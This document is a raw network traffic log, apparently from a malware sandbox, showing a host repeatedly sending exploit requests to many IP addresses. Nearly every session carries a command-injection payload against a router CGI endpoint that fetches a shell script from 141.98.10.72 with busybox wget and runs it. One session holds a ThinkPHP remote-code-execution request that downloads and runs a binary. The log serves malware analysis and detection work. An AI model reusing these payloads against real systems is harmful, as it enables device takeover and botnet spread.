Feb 14, 2024 09:29:48.569669008 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.689440966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.673234940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920530081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.879336119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
367	192.168.2.15	44338	31.136.172.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.227662086 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.857752085 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.105648041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.825685024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.945420980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.929210901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920517921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.879362106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
368	192.168.2.15	45226	94.101.207.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.250159025 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:45.509816885 CET	21	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
369	192.168.2.15	32956	94.121.194.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.271795988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
370	192.168.2.15	53678	88.203.250.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.339565039 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:44.582190037 CET	50	IN	HTTP/1.1 404 Not Found Cache-control:no-cache
Feb 14, 2024 09:29:44.582202911 CET	53	IN	Data Raw: 32 66 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a Data Ascii: 2fThe requested URL was not found on this server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
371	192.168.2.15	34132	31.136.35.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.447119951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:45.113670111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.457717896 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:49.337759018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.713438988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:05.465147972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:26.968646049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:09.975440025 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
372	192.168.2.15	51276	95.230.222.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.490695953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.735544920 CET	1286	IN	HTTP/1.1 200 OK Content-type: text/html Cache-Control: no-cache X-Ses: none Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 20 3c 74 69 74 6c 65 3e 42 72 69 6e 64 69 73 69 54 58 20 2d 20 44 42 39 31 2d 54 58 3c 2f 74 69 74 6c 65 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 2e 63 73 73 22 2f 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6d 61 69 6e 2e 63 73 73 22 2f 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 73 65 73 2e 73 73 69 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 64 65 76 61 65 78 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 70 61 72 61 6d 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 2f 68 65 61 64 3e 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 69 6e 69 74 28 29 3b 22 3e 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 36 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6d 75 73 74 20 73 75 70 70 6f 72 74 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 75 73 65 20 61 6c 6c 20 70 61 67 65 73 20 6f 6e 20 74 68 69 73 20 64 65 76 69 63 65 21 3c 2f 68 36 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 20 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 20 64 62 39 31 22 3e 20 3c 64 69 76 20 69 64 3d 22 74 6f 70 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 22 3e 20 3c 73 70 61 6e 20 69 64 3d 22 73 7a 22 20 63 6c 61 73 73 3d 22 68 69 64 22 3e 3c 2f 73 70 61 6e 3e 3c 68 31 3e 44 42 39 31 2d 54 58 20 2d 20 43 6f 6d 70 61 63 74 20 49 50 20 41 75 64 69 6f 20 45 6e 63 6f 64 65 72 3c 62 3e 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3c 2f 62 3e 3c 2f 68 31 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 76 61 62 72 6f 61 64 63 61 73 74 2e 63 6f 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 64 62 5f 6c 6f 67 6f 2e 73 76 67 22 20 69 64 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 44 45 56 41 20 42 72 6f 61 64 63 61 73 74 20 4c 74 64 2e 22 2f 3e 20 3c 2f 61 3e 20 3c 2f 64 69 76 3e 20 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 20 3c 64 69 76 20 69 64 3d 22 6d 65 74 65 72 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 22 3e 20 3c 64 69 76 20 69 64 3d 22 69 66 72 6d 6d 65 74 65 72 22 3e 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 69 66 72 6d 6d 74 Data Ascii: <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/> <title>BrindisiTX - DB91-TX</title> <link rel="stylesheet" href="s.css"/> <link rel="stylesheet" href="main.css"/> <script type="text/javascript" src="ses.ssi"></script> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/jquery.devaext.js"></script> <script type="text/javascript" src="js/main.js"></script> <script type="text/javascript" src="js/params.js"></script> </head> <body onload="init();"> <noscript><h6 style="text-align:center; position:relative; z-index: 1000; border:1px solid #000;">Your browser must support JavaScript in order to use all pages on this device!</h6></noscript> <div id="outer" class="frame db91"> <div id="top" class="frame"> <span id="sz" class="hid"></span><h1>DB91-TX - Compact IP Audio Encoder<b> Configuration</b></h1> <a href="http://www.devabroadcast.com" target="_blank"> <img src="img/db_logo.svg" id="logo" alt="DEVA Broadcast Ltd."/> </a> </div> <div id="wrap"> <div id="meter" class="frame"> <div id="ifrmmeter"> <iframe id="ifrmmt

Session ID	Source IP	Source Port	Destination IP	Destination Port
373	192.168.2.15	46710	94.121.73.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.518697023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
374	192.168.2.15	58234	94.123.139.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.518841028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
375	192.168.2.15	46666	31.200.123.177	8080

Timestamp	Bytes transferred	Direction	Data
